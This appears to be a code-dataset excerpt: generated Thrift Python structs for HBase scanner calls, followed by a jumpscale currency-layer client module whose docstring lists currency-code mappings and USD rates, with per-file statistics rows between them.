    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getScannerRows_args')
    if self.scannerId is not None:
      oprot.writeFieldBegin('scannerId', TType.I32, 1)
      oprot.writeI32(self.scannerId)
      oprot.writeFieldEnd()
    if self.numRows is not None:
      oprot.writeFieldBegin('numRows', TType.I32, 2)
      oprot.writeI32(self.numRows)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required scannerId is missing."""
    if self.scannerId is None:
      raise TProtocol.TProtocolException(message='Required field scannerId is unset!')
    return
  def __repr__(self):
    """Debug representation listing every attribute as name=value."""
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class getScannerRows_result:
  """
  Attributes:
   - success
   - io
   - ia: if the scannerId is invalid
  """
  # Field descriptors: success is a list<TResult>; io/ia are exception structs.
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2
  )
  def __init__(self, success=None, io=None, ia=None,):
    self.success = success
    self.io = io
    self.ia = ia
  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Decode a list of TResult structs (temporaries are generator-named).
          self.success = []
          (_etype80, _size77) = iprot.readListBegin()
          for _i81 in xrange(_size77):
            _elem82 = TResult()
            _elem82.read(iprot)
            self.success.append(_elem82)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.ia = TIllegalArgument()
          self.ia.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getScannerRows_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter83 in self.success:
        iter83.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    if self.ia is not None:
      oprot.writeFieldBegin('ia', TType.STRUCT, 2)
      self.ia.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """No required fields: always passes."""
    return
  def __repr__(self):
    """Debug representation listing every attribute as name=value."""
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class closeScanner_args:
  """
  Attributes:
   - scannerId: the Id of the Scanner to close *
  """
  thrift_spec = (
    None, # 0
    (1, TType.I32, 'scannerId', None, None, ), # 1
  )
  def __init__(self, scannerId=None,):
    self.scannerId = scannerId
  def read(self, iprot):
    """Populate this struct from *iprot*, skipping unrecognized fields."""
    # Prefer the C-accelerated decoder when every precondition holds.
    can_accelerate = (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                      and isinstance(iprot.trans, TTransport.CReadableTransport)
                      and self.thrift_spec is not None
                      and fastbinary is not None)
    if can_accelerate:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic slow path: walk fields until the STOP marker.
    iprot.readStructBegin()
    while True:
      (_, field_type, field_id) = iprot.readFieldBegin()
      if field_type == TType.STOP:
        break
      if field_id == 1 and field_type == TType.I32:
        self.scannerId = iprot.readI32()
      else:
        iprot.skip(field_type)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Emit this struct to *oprot*; an unset scannerId is simply omitted."""
    can_accelerate = (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                      and self.thrift_spec is not None
                      and fastbinary is not None)
    if can_accelerate:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('closeScanner_args')
    if self.scannerId is not None:
      oprot.writeFieldBegin('scannerId', TType.I32, 1)
      oprot.writeI32(self.scannerId)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Require scannerId to be set before transmission."""
    if self.scannerId is None:
      raise TProtocol.TProtocolException(message='Required field scannerId is unset!')
  def __repr__(self):
    """Debug representation listing every attribute as name=value."""
    pairs = ', '.join('%s=%r' % kv for kv in self.__dict__.iteritems())
    return '%s(%s)' % (self.__class__.__name__, pairs)
  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class closeScanner_result:
  """
  Attributes:
   - io
   - ia: if the scannerId is invalid
  """
  # Field descriptors indexed by thrift field id (slot 0 unused: void return).
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2
  )
  def __init__(self, io=None, ia=None,):
    self.io = io
    self.ia = ia
  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.ia = TIllegalArgument()
          self.ia.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('closeScanner_result')
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    if self.ia is not None:
      oprot.writeFieldBegin('ia', TType.STRUCT, 2)
      self.ia.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """No required fields: always passes."""
    return
  def __repr__(self):
    """Debug representation listing every attribute as name=value."""
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
| 31.357048
| 188
| 0.658828
| 11,375
| 94,322
| 5.280527
| 0.028308
| 0.015483
| 0.027869
| 0.024873
| 0.902407
| 0.878667
| 0.870409
| 0.857707
| 0.848383
| 0.838411
| 0
| 0.005506
| 0.229809
| 94,322
| 3,007
| 189
| 31.367476
| 0.821325
| 0.093923
| 0
| 0.842946
| 1
| 0
| 0.035198
| 0.00075
| 0
| 0
| 0
| 0
| 0
| 1
| 0.110914
| false
| 0.005768
| 0.002662
| 0.028838
| 0.217835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4063319c787e45fde05e1706897065720b502962
| 14,646
|
py
|
Python
|
jumpscale/clients/currencylayer/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 13
|
2020-09-02T09:05:08.000Z
|
2022-03-12T02:43:24.000Z
|
jumpscale/clients/currencylayer/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 1,998
|
2020-06-15T11:46:10.000Z
|
2022-03-24T22:12:41.000Z
|
jumpscale/clients/currencylayer/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 8
|
2020-09-29T06:50:35.000Z
|
2021-06-14T03:30:52.000Z
|
"""
JS-NG> fake = j.clients.currencylayer.new('fake')
JS-NG> fake.cur2id_print()
{'aed': 1,
'afn': 2,
'all': 3,
'amd': 4,
'ang': 5,
'aoa': 6,
'ars': 7,
'aud': 8,
'awg': 9,
'azn': 10,
'bam': 11,
'bbd': 12,
'bdt': 13,
'bgn': 14,
'bhd': 15,
'bif': 16,
'bmd': 17,
'bnd': 18,
'bob': 19,
'brl': 20,
'bsd': 21,
'btc': 22,
'btn': 23,
'bwp': 24,
'byn': 25,
'byr': 26,
'bzd': 27,
'cad': 28,
'cdf': 29,
'chf': 30,
'clf': 31,
'clp': 32,
'cny': 33,
'cop': 34,
'crc': 35,
'cuc': 36,
'cup': 37,
'cve': 38,
'czk': 39,
'djf': 40,
'dkk': 41,
'dop': 42,
'dzd': 43,
'egp': 44,
'ern': 45,
'etb': 46,
'eth': 47,
'eur': 48,
'fjd': 49,
'fkp': 50,
'gbp': 51,
'gel': 52,
'ggp': 53,
'ghs': 54,
'gip': 55,
'gmd': 56,
'gnf': 57,
'gtq': 58,
'gyd': 59,
'hkd': 60,
'hnl': 61,
'hrk': 62,
'htg': 63,
'huf': 64,
'idr': 65,
'ils': 66,
'imp': 67,
'inr': 68,
'iqd': 69,
'irr': 70,
'isk': 71,
'jep': 72,
'jmd': 73,
'jod': 74,
'jpy': 75,
'kes': 76,
'kgs': 77,
'khr': 78,
'kmf': 79,
'kpw': 80,
'krw': 81,
'kwd': 82,
'kyd': 83,
'kzt': 84,
'lak': 85,
'lbp': 86,
'lkr': 87,
'lrd': 88,
'lsl': 89,
'ltl': 90,
'lvl': 91,
'lyd': 92,
'mad': 93,
'mdl': 94,
'mga': 95,
'mkd': 96,
'mmk': 97,
'mnt': 98,
'mop': 99,
'mro': 100,
'mur': 101,
'mvr': 102,
'mwk': 103,
'mxn': 104,
'myr': 105,
'mzn': 106,
'nad': 107,
'ngn': 108,
'nio': 109,
'nok': 110,
'npr': 111,
'nzd': 112,
'omr': 113,
'pab': 114,
'pen': 115,
'pgk': 116,
'php': 117,
'pkr': 118,
'pln': 119,
'pyg': 120,
'qar': 121,
'ron': 122,
'rsd': 123,
'rub': 124,
'rwf': 125,
'sar': 126,
'sbd': 127,
'scr': 128,
'sdg': 129,
'sek': 130,
'sgd': 131,
'shp': 132,
'sll': 133,
'sos': 134,
'srd': 135,
'std': 136,
'svc': 137,
'syp': 138,
'szl': 139,
'thb': 140,
'tjs': 141,
'tmt': 142,
'tnd': 143,
'top': 144,
'try': 145,
'ttd': 146,
'twd': 147,
'tzs': 148,
'uah': 149,
'ugx': 150,
'usd': 151,
'uyu': 152,
'uzs': 153,
'vef': 154,
'vnd': 155,
'vuv': 156,
'wst': 157,
'xaf': 158,
'xag': 159,
'xau': 160,
'xcd': 161,
'xdr': 162,
'xof': 163,
'xpf': 164,
'xrp': 165,
'yer': 166,
'zar': 167,
'zmk': 168,
'zmw': 169,
'zwl': 170}
JS-NG> fake.id2cur_print()
{1: 'aed',
2: 'afn',
3: 'all',
4: 'amd',
5: 'ang',
6: 'aoa',
7: 'ars',
8: 'aud',
9: 'awg',
10: 'azn',
11: 'bam',
12: 'bbd',
13: 'bdt',
14: 'bgn',
15: 'bhd',
16: 'bif',
17: 'bmd',
18: 'bnd',
19: 'bob',
20: 'brl',
21: 'bsd',
22: 'btc',
23: 'btn',
24: 'bwp',
25: 'byn',
26: 'byr',
27: 'bzd',
28: 'cad',
29: 'cdf',
30: 'chf',
31: 'clf',
32: 'clp',
33: 'cny',
34: 'cop',
35: 'crc',
36: 'cuc',
37: 'cup',
38: 'cve',
39: 'czk',
40: 'djf',
41: 'dkk',
42: 'dop',
43: 'dzd',
44: 'egp',
45: 'ern',
46: 'etb',
47: 'eth',
48: 'eur',
49: 'fjd',
50: 'fkp',
51: 'gbp',
52: 'gel',
53: 'ggp',
54: 'ghs',
55: 'gip',
56: 'gmd',
57: 'gnf',
58: 'gtq',
59: 'gyd',
60: 'hkd',
61: 'hnl',
62: 'hrk',
63: 'htg',
64: 'huf',
65: 'idr',
66: 'ils',
67: 'imp',
68: 'inr',
69: 'iqd',
70: 'irr',
71: 'isk',
72: 'jep',
73: 'jmd',
74: 'jod',
75: 'jpy',
76: 'kes',
77: 'kgs',
78: 'khr',
79: 'kmf',
80: 'kpw',
81: 'krw',
82: 'kwd',
83: 'kyd',
84: 'kzt',
85: 'lak',
86: 'lbp',
87: 'lkr',
88: 'lrd',
89: 'lsl',
90: 'ltl',
91: 'lvl',
92: 'lyd',
93: 'mad',
94: 'mdl',
95: 'mga',
96: 'mkd',
97: 'mmk',
98: 'mnt',
99: 'mop',
100: 'mro',
101: 'mur',
102: 'mvr',
103: 'mwk',
104: 'mxn',
105: 'myr',
106: 'mzn',
107: 'nad',
108: 'ngn',
109: 'nio',
110: 'nok',
111: 'npr',
112: 'nzd',
113: 'omr',
114: 'pab',
115: 'pen',
116: 'pgk',
117: 'php',
118: 'pkr',
119: 'pln',
120: 'pyg',
121: 'qar',
122: 'ron',
123: 'rsd',
124: 'rub',
125: 'rwf',
126: 'sar',
127: 'sbd',
128: 'scr',
129: 'sdg',
130: 'sek',
131: 'sgd',
132: 'shp',
133: 'sll',
134: 'sos',
135: 'srd',
136: 'std',
137: 'svc',
138: 'syp',
139: 'szl',
140: 'thb',
141: 'tjs',
142: 'tmt',
143: 'tnd',
144: 'top',
145: 'try',
146: 'ttd',
147: 'twd',
148: 'tzs',
149: 'uah',
150: 'ugx',
151: 'usd',
152: 'uyu',
153: 'uzs',
154: 'vef',
155: 'vnd',
156: 'vuv',
157: 'wst',
158: 'xaf',
159: 'xag',
160: 'xau',
161: 'xcd',
162: 'xdr',
163: 'xof',
164: 'xpf',
165: 'xrp',
166: 'yer',
167: 'zar',
168: 'zmk',
169: 'zmw',
170: 'zwl'}
JS-NG> fake.id2cur
{1: 'aed', 2: 'afn', 3: 'all', 4: 'amd', 5: 'ang', 6: 'aoa', 7: 'ars', 8: 'aud', 9: 'awg', 10: 'azn', 11: 'bam', 12: 'b
bd', 13: 'bdt', 14: 'bgn', 15: 'bhd', 16: 'bif', 17: 'bmd', 18: 'bnd', 19: 'bob', 20: 'brl', 21: 'bsd', 22: 'btc', 23:
'btn', 24: 'bwp', 25: 'byn', 26: 'byr', 27: 'bzd', 28: 'cad', 29: 'cdf', 30: 'chf', 31: 'clf', 32: 'clp', 33: 'cny', 34
: 'cop', 35: 'crc', 36: 'cuc', 37: 'cup', 38: 'cve', 39: 'czk', 40: 'djf', 41: 'dkk', 42: 'dop', 43: 'dzd', 44: 'egp',
45: 'ern', 46: 'etb', 47: 'eth', 48: 'eur', 49: 'fjd', 50: 'fkp', 51: 'gbp', 52: 'gel', 53: 'ggp', 54: 'ghs', 55: 'gip'
, 56: 'gmd', 57: 'gnf', 58: 'gtq', 59: 'gyd', 60: 'hkd', 61: 'hnl', 62: 'hrk', 63: 'htg', 64: 'huf', 65: 'idr', 66: 'ils', 67: 'imp', 68: 'inr', 69: 'iqd', 70: 'irr', 71: 'isk', 72: 'jep', 73: 'jmd', 74: 'jod', 75: 'jpy', 76: 'kes', 77: 'kgs', 78: 'khr', 79: 'kmf', 80: 'kpw', 81: 'krw', 82: 'kwd', 83: 'kyd', 84: 'kzt', 85: 'lak', 86: 'lbp', 87: 'lkr', 88: 'lrd', 89: 'lsl', 90: 'ltl', 91: 'lvl', 92: 'lyd', 93: 'mad', 94: 'mdl', 95: 'mga', 96: 'mkd', 97: 'mmk', 98: 'mnt', 99: 'mop', 100: 'mro', 101: 'mur', 102: 'mvr', 103: 'mwk', 104: 'mxn', 105: 'myr', 106: 'mzn', 107: 'nad', 108: 'ngn', 109: 'nio', 110: 'nok', 111: 'npr', 112: 'nzd', 113: 'omr', 114: 'pab', 115: 'pen', 116: 'pgk', 117: 'php', 118: 'pkr', 119: 'pln', 120: 'pyg', 121: 'qar', 122: 'ron', 123: 'rsd', 124: 'rub', 125: 'rwf', 126: 'sar', 127: 'sbd', 128: 'scr', 129: 'sdg', 130: 'sek', 131: 'sgd', 132: 'shp', 133: 'sll', 134: 'sos', 135: 'srd', 136: 'std', 137: 'svc', 138: 'syp', 139: 'szl', 140: 'thb', 141: 'tjs', 142: 'tmt', 143: 'tnd', 144: 'top', 145: 'try', 146: 'ttd', 147: 'twd', 148: 'tzs', 149: 'uah', 150: 'ugx', 151: 'usd', 152: 'uyu', 153: 'uzs', 154: 'vef', 155: 'vnd', 156: 'vuv', 157: 'wst', 158: 'xaf', 159: 'xag', 160: 'xau', 161: 'xcd', 162: 'xdr', 163: 'xof', 164: 'xpf', 165: 'xrp', 166: 'yer', 167: 'zar', 168: 'zmk', 169: 'zmw', 170: 'zwl'}
JS-NG> fake.cur2id
{'aed': 1, 'afn': 2, 'all': 3, 'amd': 4, 'ang': 5, 'aoa': 6, 'ars': 7, 'aud': 8, 'awg': 9, 'azn': 10, 'bam': 11, 'bbd':
12, 'bdt': 13, 'bgn': 14, 'bhd': 15, 'bif': 16, 'bmd': 17, 'bnd': 18, 'bob': 19, 'brl': 20, 'bsd': 21, 'btc': 22, 'btn
': 23, 'bwp': 24, 'byn': 25, 'byr': 26, 'bzd': 27, 'cad': 28, 'cdf': 29, 'chf': 30, 'clf': 31, 'clp': 32, 'cny': 33, 'c
op': 34, 'crc': 35, 'cuc': 36, 'cup': 37, 'cve': 38, 'czk': 39, 'djf': 40, 'dkk': 41, 'dop': 42, 'dzd': 43, 'egp': 44,
'ern': 45, 'etb': 46, 'eth': 47, 'eur': 48, 'fjd': 49, 'fkp': 50, 'gbp': 51, 'gel': 52, 'ggp': 53, 'ghs': 54, 'gip': 55
, 'gmd': 56, 'gnf': 57, 'gtq': 58, 'gyd': 59, 'hkd': 60, 'hnl': 61, 'hrk': 62, 'htg': 63, 'huf': 64, 'idr': 65, 'ils': 66, 'imp': 67, 'inr': 68, 'iqd': 69, 'irr': 70, 'isk': 71, 'jep': 72, 'jmd': 73, 'jod': 74, 'jpy': 75, 'kes': 76, 'kgs': 77, 'khr': 78, 'kmf': 79, 'kpw': 80, 'krw': 81, 'kwd': 82, 'kyd': 83, 'kzt': 84, 'lak': 85, 'lbp': 86, 'lkr': 87, 'lrd': 88, 'lsl': 89, 'ltl': 90, 'lvl': 91, 'lyd': 92, 'mad': 93, 'mdl': 94, 'mga': 95, 'mkd': 96, 'mmk': 97, 'mnt': 98, 'mop': 99, 'mro': 100, 'mur': 101, 'mvr': 102, 'mwk': 103, 'mxn': 104, 'myr': 105, 'mzn': 106, 'nad': 107, 'ngn': 108, 'nio': 109, 'nok': 110, 'npr': 111, 'nzd': 112, 'omr': 113, 'pab': 114, 'pen': 115, 'pgk': 116, 'php': 117, 'pkr': 118, 'pln': 119, 'pyg': 120, 'qar': 121, 'ron': 122, 'rsd': 123, 'rub': 124, 'rwf': 125, 'sar': 126, 'sbd': 127, 'scr': 128, 'sdg': 129, 'sek': 130, 'sgd': 131, 'shp': 132, 'sll': 133, 'sos': 134, 'srd': 135, 'std': 136, 'svc': 137, 'syp': 138, 'szl': 139, 'thb': 140, 'tjs': 141, 'tmt': 142, 'tnd': 143, 'top': 144, 'try': 145, 'ttd': 146, 'twd': 147, 'tzs': 148, 'uah': 149, 'ugx': 150, 'usd': 151, 'uyu': 152, 'uzs': 153, 'vef': 154, 'vnd': 155, 'vuv': 156, 'wst': 157, 'xaf': 158, 'xag': 159, 'xau': 160, 'xcd': 161, 'xdr': 162, 'xof': 163, 'xpf': 164, 'xrp': 165, 'yer': 166, 'zar': 167, 'zmk': 168, 'zmw': 169, 'zwl': 170}
JS-NG>
JS-NG> fake.api_key="VALID KEY"
JS-NG> j.clients.currencylayer.fake.load()
JS-NG> j.clients.currencylayer.fake.id2cur_print()
{1: 'aed',
2: 'afn',
3: 'all',
4: 'amd',
5: 'ang',
6: 'aoa',
7: 'ars',
8: 'aud',
9: 'awg',
10: 'azn',
11: 'bam',
12: 'bbd',
13: 'bdt',
14: 'bgn',
15: 'bhd',
16: 'bif',
17: 'bmd',
18: 'bnd',
19: 'bob',
20: 'brl',
21: 'bsd',
22: 'btc',
23: 'btn',
24: 'bwp',
25: 'byn',
26: 'byr',
27: 'bzd',
28: 'cad',
29: 'cdf',
30: 'chf',
31: 'clf',
32: 'clp',
33: 'cny',
34: 'cop',
35: 'crc',
36: 'cuc',
37: 'cup',
38: 'cve',
39: 'czk',
40: 'djf',
41: 'dkk',
42: 'dop',
43: 'dzd',
44: 'egp',
45: 'ern',
46: 'etb',
47: 'eth',
48: 'eur',
49: 'fjd',
50: 'fkp',
51: 'gbp',
52: 'gel',
53: 'ggp',
54: 'ghs',
55: 'gip',
56: 'gmd',
57: 'gnf',
58: 'gtq',
59: 'gyd',
60: 'hkd',
61: 'hnl',
62: 'hrk',
63: 'htg',
64: 'huf',
65: 'idr',
66: 'ils',
67: 'imp',
68: 'inr',
69: 'iqd',
70: 'irr',
71: 'isk',
72: 'jep',
73: 'jmd',
74: 'jod',
75: 'jpy',
76: 'kes',
77: 'kgs',
78: 'khr',
79: 'kmf',
80: 'kpw',
81: 'krw',
82: 'kwd',
83: 'kyd',
84: 'kzt',
85: 'lak',
86: 'lbp',
87: 'lkr',
88: 'lrd',
89: 'lsl',
90: 'ltl',
91: 'lvl',
92: 'lyd',
93: 'mad',
94: 'mdl',
95: 'mga',
96: 'mkd',
97: 'mmk',
98: 'mnt',
99: 'mop',
100: 'mro',
101: 'mur',
102: 'mvr',
103: 'mwk',
104: 'mxn',
105: 'myr',
106: 'mzn',
107: 'nad',
108: 'ngn',
109: 'nio',
110: 'nok',
111: 'npr',
112: 'nzd',
113: 'omr',
114: 'pab',
115: 'pen',
116: 'pgk',
117: 'php',
118: 'pkr',
119: 'pln',
120: 'pyg',
121: 'qar',
122: 'ron',
123: 'rsd',
124: 'rub',
125: 'rwf',
126: 'sar',
127: 'sbd',
128: 'scr',
129: 'sdg',
130: 'sek',
131: 'sgd',
132: 'shp',
133: 'sll',
134: 'sos',
135: 'srd',
136: 'std',
137: 'svc',
138: 'syp',
139: 'szl',
140: 'thb',
141: 'tjs',
142: 'tmt',
143: 'tnd',
144: 'top',
145: 'try',
146: 'ttd',
147: 'twd',
148: 'tzs',
149: 'uah',
150: 'ugx',
151: 'usd',
152: 'uyu',
153: 'uzs',
154: 'vef',
155: 'vnd',
156: 'vuv',
157: 'wst',
158: 'xaf',
159: 'xag',
160: 'xau',
161: 'xcd',
162: 'xdr',
163: 'xof',
164: 'xpf',
165: 'xrp',
166: 'yer',
167: 'zar',
168: 'zmk',
169: 'zmw',
170: 'zwl'}
JS-NG> j.clients.currencylayer.fake.cur2usd_print()
{'': 1,
'aed': 3.672979,
'afn': 78.296617,
'ah': 24.914996,
'all': 109.150047,
'amd': 476.210221,
'ang': 1.78525,
'aoa': 362.0025,
'ar': 3.75045,
'ars': 55.394992,
'aud': 1.474703,
'awg': 1.8,
'azn': 1.704964,
'bam': 1.758993,
'bbd': 2.0194,
'bd': 8.221403,
'bdt': 83.745499,
'bgn': 1.760801,
'bhd': 0.375961,
'bif': 1855,
'bmd': 1,
'bnd': 1.350696,
'bob': 6.86065,
'brl': 4.152695,
'bsd': 0.99205,
'btc': 9.948852946999476e-05,
'btn': 71.884502,
'bwp': 10.961999,
'byn': 2.060501,
'byr': 19600,
'bzd': 2.01595,
'cad': 1.32733,
'cdf': 1659.99946,
'chf': 0.978545,
'clf': 0.026094,
'clp': 720.00501,
'cny': 7.151304,
'cop': 3431.55,
'cr': 13.669974,
'crc': 567.080062,
'cuc': 1,
'cup': 26.5,
'cve': 98.749501,
'czk': 23.208988,
'egp': 16.53602,
'ek': 9.67235,
'ern': 14.999484,
'etb': 29.000284,
'eth': 0.005395489370885939,
'eur': 0.900035,
'fjd': 2.17495,
'fkp': 0.81691,
'g': 45.119039,
'gbp': 0.81752,
'gd': 1.38792,
'gel': 2.925034,
'ggp': 0.81764,
'ghs': 5.402501,
'gip': 0.81691,
'gmd': 50.415037,
'gnf': 9239.999966,
'gtq': 7.680957,
'gx': 3685.496424,
'gyd': 209.244968,
'hkd': 7.84595,
'hnl': 24.674984,
'hp': 1.320898,
'hrk': 6.653399,
'htg': 95.361503,
'huf': 296.280997,
'idr': 14258.25,
'ils': 3.52095,
'imp': 0.81764,
'inr': 71.792403,
'iqd': 1190,
'irr': 42104.999481,
'isk': 124.829491,
'jep': 0.81764,
'jf': 177.720165,
'jmd': 134.559965,
'jod': 0.7084,
'jpy': 106.015996,
'kes': 103.389937,
'kgs': 69.8159,
'khr': 4140.000279,
'kk': 6.71151,
'kmf': 443.249767,
'kpw': 900.052015,
'krw': 1214.824979,
'kwd': 0.303901,
'kyd': 0.83355,
'kzt': 383.110385,
'lak': 8735.000017,
'lbp': 1507.949729,
'lkr': 179.605474,
'll': 9299.999946,
'lrd': 205.000232,
'lsl': 15.250149,
'ltl': 2.95274,
'lvl': 0.60489,
'lyd': 1.40503,
'mad': 9.5685,
'mdl': 17.887498,
'mga': 3674.999563,
'mkd': 55.324023,
'mmk': 1516.702673,
'mnt': 2669.391245,
'mop': 8.080496,
'mro': 357.000024,
'mur': 36.043506,
'mvr': 15.410297,
'mwk': 731.210149,
'mxn': 19.92145,
'myr': 4.198897,
'mzn': 61.020166,
'nad': 15.270055,
'ngn': 362.000148,
'nio': 33.602406,
'nok': 8.988065,
'npr': 115.010199,
'nzd': 1.56365,
'omr': 0.384976,
'op': 51.294983,
'os': 579.999893,
'pab': 0.99205,
'pen': 3.37635,
'pgk': 3.397801,
'php': 52.438012,
'pkr': 157.249855,
'pln': 3.92254,
'pyg': 6217.103241,
'qar': 3.64175,
'rd': 7.457963,
'ron': 4.256202,
'rsd': 106.069758,
'rub': 66.06102,
'rwf': 910,
'td': 21560.79,
'thb': 30.589849,
'tjs': 9.696302,
'tmt': 3.5,
'tnd': 2.857701,
'top': 2.320597,
'try': 5.81132,
'ttd': 6.71695,
'twd': 31.400972,
'tzs': 2298.149889,
'vc': 8.75195,
'vef': 9.987501,
'vnd': 23199,
'vuv': 117.90362,
'wst': 2.675215,
'xaf': 589.959986,
'xag': 0.056555,
'xau': 0.000653,
'xcd': 2.70245,
'xdr': 0.729108,
'xof': 584.499865,
'xpf': 106.950279,
'xrp': 3.771,
'yer': 250.349819,
'yp': 515.000236,
'yu': 36.34003,
'zar': 15.26498,
'zd': 119.879946,
'zl': 15.269489,
'zmk': 9001.202171,
'zmw': 13.112024,
'zs': 9376.306597,
'zwl': 322.000001}
"""
def export_module_as():
    """Return a StoredFactory that manages CurrencyLayerClient instances.

    Imports are kept function-local, as in the original module layout.
    """
    from jumpscale.core.base import StoredFactory
    from .currencylayer import CurrencyLayerClient

    factory = StoredFactory(CurrencyLayerClient)
    return factory
| 20.455307
| 1,337
| 0.457053
| 2,279
| 14,646
| 2.934182
| 0.258447
| 0.005982
| 0.007178
| 0.003589
| 0.701062
| 0.701062
| 0.689248
| 0.689248
| 0.689248
| 0.689248
| 0
| 0.297685
| 0.247918
| 14,646
| 715
| 1,338
| 20.483916
| 0.309396
| 0.987369
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
40bebeabbf79ea9774e5c3dca1d8cd3ac6772646
| 2,712
|
py
|
Python
|
test/v1/test_users.py
|
SelaDanti/store-manager-api
|
3d3a26ebf961ddb2c97f0d31c48ae07b43201b4f
|
